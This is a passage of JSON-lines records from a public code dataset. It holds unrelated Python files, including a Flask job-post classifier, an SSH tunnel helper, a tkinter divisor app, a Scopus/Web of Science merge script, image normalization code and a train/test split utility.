Valid Job Post with an accuracy of {(round(my_list2[0][0], 2) * 100)}% Apply Now\"\r\n return render_template('results.html', answer=answer)\r\n \r\n \r\n@app.route('/submit_feedback', methods=['POST'])\r\ndef submit_feedback():\r\n feedback = request.form.get('feedback')\r\n \r\n with open('new_target_column.csv', 'a') as my_file:\r\n my_feedback = my_file.writelines(f\"{feedback}\\n\")\r\n \r\n return render_template('results2.html')\r\n\r\n\r\n","repo_name":"Aquila-byte/JobClassifier","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"37503963706","text":"from collections import deque\nn = int(input())\nif n == 1:\n print(0)\n print(1)\n exit(0)\n\nvisit = [0]*(n+1)\nq = deque([n])\n\nwhile q:\n now = q.popleft()\n x = []\n if not now % 3:\n x.append(now//3)\n if not now % 2:\n x.append(now//2)\n x.append(now-1)\n c = False\n for i in x:\n if not visit[i]:\n visit[i] = now\n q.append(i)\n if i == 1:\n c = True\n break\n if c:\n break\n\ny = 1\nr = [1]\nwhile y != n:\n y = visit[y]\n r.append(y)\nr.reverse()\nprint(len(r)-1)\nprint(*r)\n","repo_name":"Seungwuk98/Algorithm-Solving-python3","sub_path":"12852BOJ_make1.py","file_name":"12852BOJ_make1.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"24648671517","text":"\"\"\"\nModule for creating persistent SSH connections for use with synchronous\ncommands. Typically, tunnels should be invoked as a context manager to\nensure proper cleanup. 
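The TenSEAL record above serializes its results without ever checking them locally. A quick sanity check of the same BFV ciphertext-plaintext product, using only calls that already appear in the snippet plus `.decrypt()` (which works here because a freshly created context keeps the secret key):

```python
# Encrypt, multiply by a plain vector, decrypt, compare with plaintext math.
import tenseal as ts

ctx = ts.context(ts.SCHEME_TYPE.BFV, poly_modulus_degree=4096, plain_modulus=1032193)
enc = ts.bfv_vector(ctx, [138])
result = enc * [914]                     # ciphertext-plaintext multiplication
assert result.decrypt() == [138 * 914]   # 126132, well below the plain modulus
```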
E.G.:\nwith tunnel(*args, **kwargs) as my_tunnel:\n my_tunnel.write_to_remote('/usr/local/usrpath/testfile.txt', 'test_file.txt')\n my_tunnel.remote_cmd(['cat', 'test_file.txt'])\n\"\"\"\nimport logging\nimport os\nimport stat\nimport tempfile\nfrom contextlib import contextmanager, ExitStack\nfrom subprocess import check_call, check_output, TimeoutExpired\nfrom typing import Optional\n\nfrom pkgpanda.util import write_string\n\nlogger = logging.getLogger(__name__)\n\n\nclass Tunnelled():\n def __init__(self, base_cmd: list, host: str, target: str):\n self.base_cmd = base_cmd\n self.host = host\n self.target = target\n\n def remote_cmd(self, cmd: list, timeout: Optional[int]=None, stdout=None):\n \"\"\"\n Args:\n cmd: list of strings that will be interpretted in a subprocess\n timeout: (int) number of seconds until process timesout\n stdout: file object to redirect stdout to\n \"\"\"\n run_cmd = self.base_cmd + [self.target] + cmd\n logger.debug('Running socket cmd: ' + ' '.join(run_cmd))\n try:\n if stdout:\n return check_call(run_cmd, stdout=stdout, timeout=timeout)\n else:\n return check_output(run_cmd, timeout=timeout)\n except TimeoutExpired as e:\n logging.exception('{} timed out after {} seconds'.format(cmd, timeout))\n logging.debug('Timed out process output:\\n' + e.output.decode())\n raise\n\n def write_to_remote(self, src: str, dst: str):\n \"\"\"\n Args:\n src: local path representing source data\n dst: destination for path\n \"\"\"\n cmd = self.base_cmd + ['-C', self.target, 'cat>' + dst]\n logger.debug('Running socket write: ' + ' '.join(cmd))\n with open(src, 'r') as fh:\n check_call(cmd, stdin=fh)\n\n\n@contextmanager\ndef temp_data(key):\n temp_dir = tempfile.mkdtemp()\n socket_path = temp_dir + '/control_socket'\n key_path = temp_dir + '/key'\n write_string(key_path, key)\n os.chmod(key_path, stat.S_IREAD | stat.S_IWRITE)\n yield (socket_path, key_path)\n os.remove(key_path)\n # might have been deleted already if SSH exited correctly\n if os.path.exists(socket_path):\n os.remove(socket_path)\n os.rmdir(temp_dir)\n\n\n@contextmanager\ndef tunnel(user: str, key: str, host: str, port: int=22):\n target = user + '@' + host\n\n with temp_data(key) as temp_paths:\n base_cmd = [\n '/usr/bin/ssh',\n '-oConnectTimeout=10',\n '-oControlMaster=auto',\n '-oControlPath=' + temp_paths[0],\n '-oStrictHostKeyChecking=no',\n '-oUserKnownHostsFile=/dev/null',\n '-oBatchMode=yes',\n '-oPasswordAuthentication=no',\n '-p', str(port)]\n\n start_tunnel = base_cmd + ['-fnN', '-i', temp_paths[1], target]\n logger.debug('Starting SSH tunnel: ' + ' '.join(start_tunnel))\n # Test Code\n check_call(start_tunnel)\n logger.debug('SSH Tunnel established!')\n\n yield Tunnelled(base_cmd, host, target)\n\n close_tunnel = base_cmd + ['-O', 'exit', target]\n logger.debug('Closing SSH Tunnel: ' + ' '.join(close_tunnel))\n check_call(close_tunnel)\n\n\n@contextmanager\ndef tunnel_collection(user, key, host_names: list):\n \"\"\"Convenience collection of Tunnels so that users can keep\n multiple connections alive with a single self-closing context\n Args:\n user: user with access to host\n key: contents of private key\n host_names: list of locally resolvable hostname:port to tunnel to\n \"\"\"\n\n with ExitStack() as exit_stack:\n logger.debug('Creating TunnelCollection for the following: ' + str(host_names))\n tunnels = list()\n for host in host_names:\n ip, port = host.split(':')\n tunnels.append(exit_stack.enter_context(tunnel(user, key, ip, port)))\n logger.debug('Successfully created TunnelCollection')\n 
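The `tunnel` helper above is meant to be driven exactly as its module docstring shows. A hypothetical end-to-end sketch (the user, host address, key material, and remote paths below are placeholders, not values from this repo):

```python
# Copy a script to the remote host over the persistent control socket and
# run it, reusing the same SSH master connection for both operations.
def copy_and_run(key_material: str) -> bytes:
    with tunnel('centos', key_material, '10.0.0.5', port=22) as t:
        t.write_to_remote('/tmp/payload.sh', 'payload.sh')
        # remote_cmd returns check_output's bytes when no stdout is given
        return t.remote_cmd(['bash', 'payload.sh'], timeout=120)
```

The ControlMaster/ControlPath options are what make this cheap: every `remote_cmd` and `write_to_remote` multiplexes over the one authenticated connection instead of re-handshaking.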
yield tunnels\n","repo_name":"mesosphere-backup/dcos-bot-branches","sub_path":"ssh/tunnel.py","file_name":"tunnel.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"29620219227","text":"# --- IMPORT ---\nfrom tkinter import *\nfrom tkinter.font import BOLD\n\n# --- FUNCTIONS ---\ndef find_dividers(n):\n \"\"\"Return a joined of dividers of n\"\"\"\n\n # Convert int into str to use join list method later\n pos_div = [str(i) for i in range(1, abs(n)+1) if n % i == 0]\n neg_div = [str(i) for i in range(-abs(n), 0) if n % i == 0]\n\n # Create a list of all dividers\n dividers = neg_div + pos_div\n return \", \".join(dividers) # string of dividers\n\ndef divider_list():\n \"\"\"Set output an error message or informations about dividers of entry value\n\n No key argument\n \"\"\"\n\n try:\n num = int(wrapper_entry.get())\n except:\n wrapper_entry[\"text\"] = \"\" # Reset entry\n output[\"fg\"] = \"#f23557\"\n output[\"text\"] = \"Please enter a valid value!\" # Error message\n return # Stop function\n\n # No exception\n output[\"fg\"] = \"white\"\n if num == 0:\n output[\"text\"] = \"INFINITE NUMBER OF DIVIDERS\"\n else:\n output[\"text\"] = f\"Dividers are:\\n{find_dividers(num)}\"\n\n\n# ************** CORE OF THE APPLICATION **************\n\n# --- MAIN WINDOW ---\n# Create window and set title\nwindow = Tk()\nwindow.title(\"Dividers\")\n\n# Set default and minimal dimensions of the window\nwindow.geometry(\"1080x720\")\nwindow.minsize(720,480)\n\n# Customization of window\nwindow.config(bg=\"#2082d8\")\nwindow.iconbitmap(\"img/pi-icon.ico\")\n\n\n# --- FRAME AND COMPONENTS ---\nwrapper = Frame(window, bg=\"#184e76\", padx=25, pady=25)\n\n# Give wrapper a title\nwrapper_title = Label(wrapper, text=\"DIVIDERS\", fg=\"white\", bg=\"#184e76\", font=(\"Courier\", 50, BOLD))\nwrapper_title.pack()\n\n# Add a instruction label\n# to say user what to do\nwrapper_instruction = Label(wrapper, text=\"Please, enter an integer\", fg=\"#fdb44b\", bg=\"#184e76\", font=(\"Courier\", 18, BOLD))\nwrapper_instruction.pack()\n\n# Create a entry for user\nwrapper_entry = Entry(wrapper, justify=\"center\", fg=\"black\", bg=\"#e7eaf6\", font=(\"Courier\", 25, BOLD))\nwrapper_entry.pack(pady=10)\n\n# Add a launcher of \"divider_list\" function\nwrapper_btn = Button(wrapper, text=\"Launch!\", fg=\"#184e76\", bg=\"#fdb44b\", font=(\"Courier\", 25, BOLD), command=divider_list)\nwrapper_btn.pack(pady=15)\n\n# Add wrapper\n# and all its components into main window\nwrapper.pack(expand=TRUE)\n\n# Output for dividers\noutput = Label(window, bg=\"#2082d8\", font=(\"Courier\", 20, BOLD))\noutput.pack(expand=TRUE, fill=BOTH)\n\n# Display main window\nwindow.mainloop()\n","repo_name":"loickcherimont/Dividers","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"6605660687","text":"\"\"\"\nThis script takes a Scopus and Web of Science file and merges them to a single dataset,\nremoving duplicates. 
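`find_dividers` in the Dividers app above walks every integer up to |n|. Pairing each divisor d with n // d cuts that to O(√|n|) while keeping the same output contract (negative divisors ascending, then positive, comma-joined); a sketch:

```python
# Divisors come in pairs (d, n // d), so scanning up to isqrt(n) is enough.
import math


def find_dividers_fast(n: int) -> str:
    m = abs(n)
    pos = set()
    for d in range(1, math.isqrt(m) + 1):
        if m % d == 0:
            pos.update((d, m // d))
    ordered = sorted(-d for d in pos) + sorted(pos)
    return ", ".join(str(d) for d in ordered)


assert find_dividers_fast(12) == "-12, -6, -4, -3, -2, -1, 1, 2, 3, 4, 6, 12"
```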
For further information, see README.md\nShare without any restrictions.\n\"\"\"\n\nimport csv\nimport re\nprint(\"Usage: python3 woscop.py [scopus filename.csv] [wos filename .tsv]\\n\" + \"-\" * 40)\nfrom sys import argv\n\nscript, scopusfile, wosfile = argv\n\nscopuscsv = open(scopusfile,'r') # change file-name here\nscopusdata = csv.reader(scopuscsv, delimiter=',', quotechar='\"')\n\nwostsv = open(wosfile, 'r')\nwosdata = csv.reader(wostsv, delimiter='\\t')\n\n#For debugging only, verify with your original download of records.\nscopuscount = 0\nwoscount = 0\n\nrecordlist = [] #Holds the extracted data from the loops\ntherecords = {} #Takes the duplicate check string as key and the rest of the data as value\n\n#Loops to extract the duplicate check string and the desired fields in the data.\nfor s in scopusdata:\n scopuscount += 1 #Just to count\n #print(s[0]) #print whatever you want to add. See headers in the csv file\n stitlelowered = s[1].lower() #just making lower cases\n ssplitted = stitlelowered.split() #split up the words in the title\n sfirstsevenwords = ssplitted[0:7] # add only the first seven words to avoid dual language titles\n sjoined = ''.join(sfirstsevenwords) # join back again.\n stitlenonspecialchar = re.sub(r'[^A-Za-z0-9]+',r'',sjoined) # remove everything except words and numbers\n recordlist.append([stitlenonspecialchar, s[0], s[2], s[1], s[2], s[3], s[4]]) # put everything you want in a list\n\nfor w in wosdata:\n woscount += 1\n #print(w)\n #print(w[1])\n titlelowered = w[8].lower()\n splitted = titlelowered.split()\n firstsevenwords = splitted[0:7]\n joined = ''.join(firstsevenwords)\n titlenonspecialchar = re.sub(r'[^A-Za-z0-9]+',r'',joined)\n recordlist.append([titlenonspecialchar, w[1], w[44], w[8], w[9], w[45], w[46]])\n\n# Takes the duplicate check string as a key in the dictionary and the rest as value\nfor r in recordlist:\n therecords.update({r[0]: [r[1], r[2], r[3], r[4], r[5], r[6]]})\n\n# This removes duplicates by adding only if the duplicate checker does NOT exist in the result dict.\nresult = {}\nfor key, value in therecords.items():\n if key not in result:\n result[key] = value\n\n# Open and write to a new csv.\nwith open('output.csv', 'w') as csvfile:\n fieldnames = ['Author', 'Year', 'Title', 'Journal', 'Volume', 'Issue'] #add here whatever you need\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames, quotechar='\"')\n writer.writeheader()\n for key, value in sorted(result.items()):\n #print(value[0])\n writer.writerow({'Author': value[0], 'Year': value[1], 'Title': value[2], 'Journal': value[3], 'Volume': value[4], 'Issue': value[5]}) # Then add here also\n\n#Print some control information\nprint(\"There were originally \" + str(scopuscount - 1) + \" Scopus records and \" + str(woscount - 1) + \" WoS records.\")\nprint(\"Duplicates excluded, there are now \" + str(len(therecords)) + \" records.\")\nprint(\"Writing to file \" + str(len(result)) + \" records.\\n File written: output.csv\")\n","repo_name":"christopherkullenberg/WoScop","sub_path":"woscop.py","file_name":"woscop.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"91"} +{"seq_id":"7800663518","text":"import sys\n\nimport cv2\nimport gflags\nimport numpy as np\nfrom . 
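The WoScop script above reduces each title to a lowercase, alphanumeric-only prefix and uses that as the duplicate key (the slices are now `[0:7]`, matching the "first seven words" rule the comments describe; the original `[0:6]` kept only six). The same rule as a small, testable helper:

```python
# Build the duplicate-check key: first n words, lowercased, joined,
# with everything except letters and digits stripped.
import re


def dedup_key(title: str, n_words: int = 7) -> str:
    words = title.lower().split()[:n_words]
    return re.sub(r'[^A-Za-z0-9]+', '', ''.join(words))


assert dedup_key("A Study of Things: Part II") == "astudyofthingspartii"
```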
import parse_dataset\n\n\ndef resize_and_crop(img, size, return_mask=False, border_mode='replicate'):\n '''\n We keep the whole image content and pad if necessary.\n '''\n h, w = img.shape\n\n longer_side = max(h, w)\n\n scale = float(size) / longer_side\n\n img2 = cv2.resize(img, None, fx=scale, fy=scale)\n\n padleft = (size - img2.shape[1]) // 2\n padright = size - img2.shape[1] - padleft\n padtop = (size - img2.shape[0]) // 2\n padbottom = size - img2.shape[0] - padtop\n\n if border_mode == 'replicate':\n padded = cv2.copyMakeBorder(img2, padtop, padbottom, padleft, padright, cv2.BORDER_REPLICATE)\n elif border_mode == 'zero':\n padded = cv2.copyMakeBorder(img2, padtop, padbottom, padleft, padright, cv2.BORDER_CONSTANT, value=0)\n elif border_mode == 'reflect':\n padded = cv2.copyMakeBorder(img2, padtop, padbottom, padleft, padright, cv2.BORDER_REFLECT)\n elif border_mode == 'none':\n # No padding\n padded = img2\n else:\n raise RuntimeError('Unknown border mode %s' % border_mode)\n\n if return_mask:\n mask = np.ones(img2.shape, img.dtype)\n mask = cv2.copyMakeBorder(mask, padtop, padbottom, padleft, padright, cv2.BORDER_CONSTANT,\n value=0)\n return padded, mask\n\n return padded\n\n\ndef pad_or_crop(img, size, return_mask=False, border_mode='replicate'):\n \"\"\"\n Pad or crop the image to make it into specific size\n :param size: an integer\n \"\"\"\n # Crop the image\n h, w = img.shape[:2]\n\n org_shape = img.shape\n\n cropleft = (w - size) // 2\n croptop = (h - size) // 2\n\n if cropleft >= 0:\n img = img[:, cropleft: cropleft + size]\n if croptop >= 0:\n img = img[croptop: croptop + size, :]\n\n # Pad if necessary\n h, w = img.shape[:2]\n\n padleft = (size - w) // 2\n padright = size - w - padleft\n padtop = (size - h) // 2\n padbottom = size - h - padtop\n\n try:\n mask = np.ones(img.shape, img.dtype)\n\n if border_mode == 'replicate':\n img = cv2.copyMakeBorder(img, padtop, padbottom, padleft, padright, cv2.BORDER_REPLICATE)\n elif border_mode == 'zero':\n img = cv2.copyMakeBorder(img, padtop, padbottom, padleft, padright, cv2.BORDER_CONSTANT, value=0)\n elif border_mode == 'reflect':\n img = cv2.copyMakeBorder(img, padtop, padbottom, padleft, padright, cv2.BORDER_REFLECT)\n else:\n raise RuntimeError('Unknown border mode %s' % border_mode)\n\n mask = cv2.copyMakeBorder(mask, padtop, padbottom, padleft, padright, cv2.BORDER_CONSTANT,\n value=0)\n except:\n print(org_shape)\n print(img.shape)\n print(cropleft)\n print(size)\n raise\n\n if return_mask:\n return img, mask\n\n return img\n\n\ndef get_gaussian_filter(src_size, dst_size):\n downscale_factor = src_size // dst_size\n sigma = (downscale_factor - 1) / 2\n\n if downscale_factor % 2 == 0:\n kernel_size = downscale_factor + 1\n else:\n kernel_size = downscale_factor\n\n return cv2.getGaussianKernel(kernel_size, sigma)\n\n\nif __name__ == '__main__':\n import glob\n import os\n from collections import defaultdict\n\n gflags.DEFINE_string('src_dir', '', '')\n gflags.DEFINE_string('dst_dir', '', '')\n gflags.DEFINE_string('mask_dir', '', 'If specified, will output masks to this directory.')\n gflags.DEFINE_integer('size', 512, '')\n gflags.DEFINE_string('border_mode', 'zero', \"none: no border; \"\n \"replicate: replicate border pixels; \"\n \"zero: fill in zero values.\")\n gflags.DEFINE_boolean('smoothing', True,\n 'Smooth the image before downsampling. 
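`resize_and_crop` above scales by the longer side and splits the leftover pixels between opposite borders. The arithmetic pulled out in isolation (note this is a sketch: `cv2.resize`'s internal rounding can differ from Python's `round()` by a pixel):

```python
# Letterbox parameters: scale to fit the longer side into `size`, then pad
# the shorter side symmetrically; any odd leftover pixel goes right/bottom.
def letterbox_params(h: int, w: int, size: int):
    scale = size / max(h, w)
    new_h, new_w = round(h * scale), round(w * scale)
    pad_top = (size - new_h) // 2
    pad_left = (size - new_w) // 2
    return new_h, new_w, pad_top, size - new_h - pad_top, pad_left, size - new_w - pad_left


# A 300x400 image normalized to 512: width fills, height gets 64/64 padding.
assert letterbox_params(300, 400, 512) == (384, 512, 64, 64, 0, 0)
```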
'\n 'Note that here we assume original images are larger than the normalized images!')\n\n FLAGS = gflags.FLAGS\n FLAGS(sys.argv)\n\n SRC_DIR = FLAGS.src_dir\n DST_DIR = FLAGS.dst_dir\n MASK_DIR = FLAGS.mask_dir\n SIZE = FLAGS.size\n\n files = []\n for root, dirnames, filenames in os.walk(SRC_DIR):\n for fn in filenames:\n if fn.lower().endswith(('.tif', '.jpg', '.png')):\n files.append(os.path.join(root, fn))\n files.sort()\n\n print('%d files' % len(files))\n\n counts = defaultdict(int)\n\n last_img_width = None\n\n for idx, fn in enumerate(files):\n img = cv2.imread(fn, cv2.IMREAD_GRAYSCALE)\n\n if img.dtype == np.uint16:\n imgf = img / 65535.0\n elif img.dtype == np.uint8:\n imgf = img / 255.0\n else:\n raise RuntimeError('Unsupported datatype %s' % img.dtype)\n\n if len(imgf.shape) == 3 and imgf.shape[2] == 2:\n imgf = imgf[:, :, 0] # Photoshop creates one extra channel that seems to be all ones.\n\n if FLAGS.smoothing:\n if last_img_width is None or last_img_width != imgf.shape[1]:\n # Image size changed. Re-create kernel.\n filter_kernel = get_gaussian_filter(imgf.shape[1], SIZE)\n last_img_width = imgf.shape[1]\n imgf = cv2.sepFilter2D(imgf, -1, filter_kernel, filter_kernel)\n\n imgf, mask = resize_and_crop(imgf, SIZE, return_mask=True, border_mode=FLAGS.border_mode)\n\n subfamily, tribe, genus, species, sample_idx = parse_dataset.parse_filename(fn)\n bio_key = (subfamily, tribe, genus, species)\n key = bio_key + (counts[bio_key],)\n counts[bio_key] += 1\n\n out_fn = '%s.%s.%s.%s.%d.tif' % key\n cv2.imwrite(os.path.join(DST_DIR, out_fn), (imgf * 255).astype(np.uint8))\n\n if FLAGS.mask_dir != '':\n cv2.imwrite(os.path.join(MASK_DIR, out_fn), (mask * 255).astype(np.uint8))\n\n print('[%d/%d] %s -> %s' % (idx + 1, len(files), fn, out_fn))\n\n # Uncomment to visualize the output\n # cv2.imshow('resized', imgf)\n # cv2.waitKey(1)\n","repo_name":"benjlloyd/Phytolith_2D_ML","sub_path":"OLD_CODE/experimental/new_dataset/preprocess/normalization.py","file_name":"normalization.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"10945297805","text":"import os\nimport argparse\nimport json\nimport glob\nimport shutil\nfrom time import time\nimport collections\nimport math\nimport os\nimport random\nfrom distutils.dir_util import copy_tree\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-fp\", \"--fp\", help=\"Folder where is the data\")\nparser.add_argument(\"-dn\", \"--dn\", help=\"The name of the new folder where is going to be the data\")\n\nargs = parser.parse_args()\n\n\nclass dataStructuring:\n\n\tdef __init__(self,folder_path,destination_path):\n\t\t\t\n\t\t\tself.folder_path = folder_path\n\t\t\tself.destination_path = destination_path\n\n\n\tdef split_data_into_train_test(self, data_path, destination_path):\n\t\t\"\"\"\n\t\tSplits the content inside the given data path into train and test sets and creates two new directories with\n\t\tthe result.\n\t\t\"\"\"\n\t\tprint(\"Splitting data into train and test...\")\n\t\ttrain_set_path = os.path.join(destination_path, \"train_set\")\n\t\ttest_set_path = os.path.join(destination_path, \"test_set\")\n\t\tself.create_data_split_directory(destination_path=destination_path, train_set_path=train_set_path,\n\t\t\t\t\t\t\t\t\t\t test_set_path=test_set_path)\n\n\t\tlot_dirs_by_label_directory = self.get_lot_dirs_by_label_directory(data_path=data_path)\n\n\t\treturn lot_dirs_by_label_directory\n\n\n\tdef 
create_data_split_directory(self, destination_path, train_set_path, test_set_path):\n\t\t\"\"\"Creates the directories for the data split.\"\"\"\n\t\tif os.path.exists(destination_path):\n\t\t\tshutil.rmtree(destination_path)\n\t\tos.mkdir(destination_path)\n\t\tinitial_time = time()\n\t\t# Waits for some time before creating the directories inside the one that was just created.\n\t\twhile (time() - initial_time) < 1:\n\t\t\tNone\n\t\tos.mkdir(train_set_path)\n\t\tos.mkdir(test_set_path)\n\n\tdef get_lot_dirs_by_label_directory(self, data_path):\n\t\t\"\"\"\n\t\tChecks the label directories and returns a list for each one containing the paths to their respective lot\n\t\tdirectories.\n\t\t\"\"\"\n\t\tlot_dirs_by_label_directory = dict()\n\t\tfor root, dirs, files in os.walk(data_path):\n\t\t\t\n\t\t\t# Iterates over the first layer of directories.\n\t\t\tfor directory in dirs:\n\t\t\t\tdirectory_path = os.path.join(root, directory)\n\t\t\t\tlot_dirs = list()\n\t\t\t\t# Iterates over each element within the directory path.\n\t\t\t\tfor lot_directory in os.listdir(directory_path):\n\t\t\t\t\tlot_directory_path = os.path.join(directory_path, lot_directory)\n\t\t\t\t\t# Appends the current element to the list if it is a directory.\n\t\t\t\t\tlot_dirs.append(lot_directory_path) if os.path.isdir(lot_directory_path) else None\n\t\t\t\t# Creates an entry on the dictionary for every label directory.\n\t\t\t\tlot_dirs_by_label_directory[directory] = lot_dirs\n\t\t\t# Only the first layer of directories is required. It is not necessary to keep walking through the tree.\n\t\t\tbreak\n\t\t# Orders the dictionary by the label directory and returns it.\n\t\treturn collections.OrderedDict(sorted(lot_dirs_by_label_directory.items()))\n\n\n\tdef elements_numbers_for_type(self, data_path):\n\t\t\"\"\"\n\t\t\tGets the amount of each data type\n\t\t\"\"\"\n\t\tcont_rgb = 0\n\t\tcont_re = 0\n\t\tcont_rgn = 0\n\t\tcont_json = 0\n\n\t\tfor root, dirs, files in os.walk(data_path):\n\t\t\t# Iterates over all the files into de lot folder\n\t\t\tfor file in files:\n\n\t\t\t\t# Finds the type of the file and sum it to its count\n\t\t\t\tif file.find(\".json\") != -1:\n\t\t\t\t\tcont_json += 1\n\n\t\t\t\tif file.find(\"re.JPG\") != -1:\n\t\t\t\t\tcont_re += 1\n\n\t\t\t\tif file.find(\"rgn.JPG\") != -1:\n\t\t\t\t\tcont_rgn += 1\n\n\t\t\t\tif file.find(\"plant\") != -1:\n\t\t\t\t\tcont_rgb += 1\n\n\t\t\t\n\t\treturn cont_json, cont_rgb, cont_rgn, cont_re\n\n\n\tdef get_stop_criterion(self,list_conts):\n\t\t\"\"\"\n\t\t\tGets the stop criterion of the label and its index\n\t\t\"\"\"\n\t\tmin_value = min(list_conts)\n\t\tmin_index_value = list_conts.index(min(list_conts))\n\t\ttype_selection = \"\"\n\n\t\tif min_index_value == 0:\n\t\t\ttype_selection = \"json\"\n\t\t\n\t\tif min_index_value == 1:\n\t\t\ttype_selection = \"rgb\"\n\n\t\tif min_index_value == 2:\n\t\t\ttype_selection = \"rgn\"\n\n\t\tif min_index_value == 3:\n\t\t\ttype_selection = \"re\"\n\n\t\tstop_criterion = math.ceil(min_value * 0.25)\n\n\t\treturn(stop_criterion,type_selection)\n\n\n\tdef valid_for_test(self, lot_directory):\n\t\t\"\"\"\n\t\t\tGets the amount of each data type\n\t\t\"\"\"\n\t\tcont_rgb = 0\n\t\tcont_re = 0\n\t\tcont_rgn = 0\n\t\tcont_json = 0\n\n\t\tfor root, dirs, files in os.walk(lot_directory):\n\t\t\t# Iterates over all the files into de lot folder\n\t\t\tfor file in files:\n\n\t\t\t\t# Finds the type of the file and sum it to its count\n\t\t\t\tif file.find(\".json\") != -1:\n\t\t\t\t\tcont_json += 1\n\n\t\t\t\tif 
file.find(\"re.JPG\") != -1:\n\t\t\t\t\tcont_re += 1\n\n\t\t\t\tif file.find(\"rgn.JPG\") != -1:\n\t\t\t\t\tcont_rgn += 1\n\n\t\t\t\tif file.find(\"plant\") != -1:\n\t\t\t\t\tcont_rgb += 1\n\n\t\t# If It has all the type files return true\n\t\tif cont_json >= 1 and cont_rgb >= 1 and cont_rgn >= 1 and cont_re >= 1 :\n\t\t\treturn True\n\n\t\treturn False\n\n\tdef validate_stop_criterion(self, lot_directory, type_selection):\n\n\t\t\"\"\"\n\t\t\tGets the amount of each data type\n\t\t\"\"\"\n\t\tcont_rgb = 0\n\t\tcont_re = 0\n\t\tcont_rgn = 0\n\t\tcont_json = 0\n\n\t\tfor root, dirs, files in os.walk(lot_directory):\n\t\t\t# Iterates over all the files into de lot folder\n\t\t\tfor file in files:\n\n\t\t\t\t# Finds the type of the file and sum it to its count\n\t\t\t\tif file.find(\".json\") != -1:\n\t\t\t\t\tcont_json += 1\n\n\t\t\t\tif file.find(\"re.JPG\") != -1:\n\t\t\t\t\tcont_re += 1\n\n\t\t\t\tif file.find(\"rgn.JPG\") != -1:\n\t\t\t\t\tcont_rgn += 1\n\n\t\t\t\tif file.find(\"plant\") != -1:\n\t\t\t\t\tcont_rgb += 1\n\n\n\t\tif type_selection == \"json\":\n\t\t\treturn cont_json\n\t\t\n\t\tif type_selection == \"rgb\":\n\t\t\treturn cont_rgb\n\n\t\tif type_selection == \"rgn\":\n\t\t\treturn cont_rgn\n\n\t\tif type_selection == \"re\":\n\t\t\treturn cont_re\n\t\t\n\tdef copy_tree(self,list_set,list_set_path,label_directory):\n\n\t\t\"\"\"\n\t\t\tCopies the lot directory in destination directory\n\t\t\"\"\"\n\t\ttrain_lot_dirs_destination = os.path.join(list_set_path,label_directory)\n\t\tfor list_index in list_set:\n\t\t\tlot_directory_path_list = list_index.split('/')\n\t\t\t# Extracts the name of the lot directory.\n\t\t\tlot_directory_name = lot_directory_path_list[len(lot_directory_path_list) - 1]\n\t\t\tlot_directory_destination = os.path.join(train_lot_dirs_destination, lot_directory_name)\n\t\t\t# Copies the entire lot directory to the corresponding destination and preserves its content.\n\t\t\tshutil.copytree(list_index, lot_directory_destination)\n\t\t\t\n\n\tdef run(self):\n\n\t\t# Split the folder by '/'\n\t\tfolder_path_list = self.folder_path.split('/')\n\n\t\t# Removes the last element of the list\n\t\tfolder_path_list = folder_path_list[:len(folder_path_list)-2]\n\n\t\t# Create a new folder path without the last element, and concatenate the new name \n\t\tnew_folder_path = '/'.join(folder_path_list) + '/'+ args.dn\n\t\tself.destination_path = new_folder_path \n\t\t\n\t\tlot_dirs_g = self.split_data_into_train_test(self.folder_path,self.destination_path)\n\t\t\n\t\tfor label_directory, lot_dirs in lot_dirs_g.items():\n\t\t\t# shuffle the list for each label\n\t\t\trandom.shuffle(lot_dirs)\n\n\t\t\tcont_label_json = 0\n\t\t\tcont_label_rgb = 0\n\t\t\tcont_label_rgn = 0\n\t\t\tcont_label_re = 0\n\t\t\t\n\t\t\t# Iterates over the lot directories and count the amount of each type\n\t\t\tfor lot_directory in lot_dirs:\n\t\t\t\n\t\t\t\tcont_json, cont_rgb, cont_rgn, cont_re = self.elements_numbers_for_type(lot_directory)\n\t\t\t\tcont_label_json += cont_json\n\t\t\t\tcont_label_rgb += cont_rgb\n\t\t\t\tcont_label_rgn += cont_rgn\n\t\t\t\tcont_label_re += cont_re\n\n\t\t\tlist_conts = [cont_label_json, cont_label_rgb, cont_label_rgn, cont_label_re]\n\n\t\t\t# Gets the stop criterion and its type\n\t\t\tstop_criterion,type_selection = self.get_stop_criterion(list_conts)\n\t\t\n\t\t\ttrain_set = []\n\t\t\ttest_set = []\n\t\t\tcont = 0\n\t\t\t# Iterates over all the lot dirs\n\t\t\tfor lot_directory in lot_dirs:\n\n\t\t\t\t# Verifies if the dir is valid because has the 4 
types\n\t\t\t\tif self.valid_for_test(lot_directory):\n\t\t\t\t\t# Verifies if don't pass the stop croterion\n\t\t\t\t\tif cont + self.validate_stop_criterion(lot_directory,type_selection) <= stop_criterion:\n\t\t\t\t\t\ttest_set.append(lot_directory)\n\t\t\t\t\t\t# Acumulates the cont with the value of the type selection\n\t\t\t\t\t\tcont += self.validate_stop_criterion(lot_directory,type_selection)\n\n\t\t\t\t\telse:\n\t\t\t\t\t\ttrain_set.append(lot_directory)\n\n\t\t\t\telse:\n\t\t\t\t\ttrain_set.append(lot_directory)\n\t\n\t\t\ttrain_set_path = os.path.join(self.destination_path, \"train_set\")\t\n\t\t\ttest_set_path = os.path.join(self.destination_path, \"test_set\")\n\n\t\t\t# Copies train and test lists into the folders\n\t\t\tself.copy_tree(train_set,train_set_path,label_directory)\n\t\t\tself.copy_tree(test_set,test_set_path,label_directory)\n\t\t\t\n\t\tprint(\"Splitting data successfully...\")\n\nds = 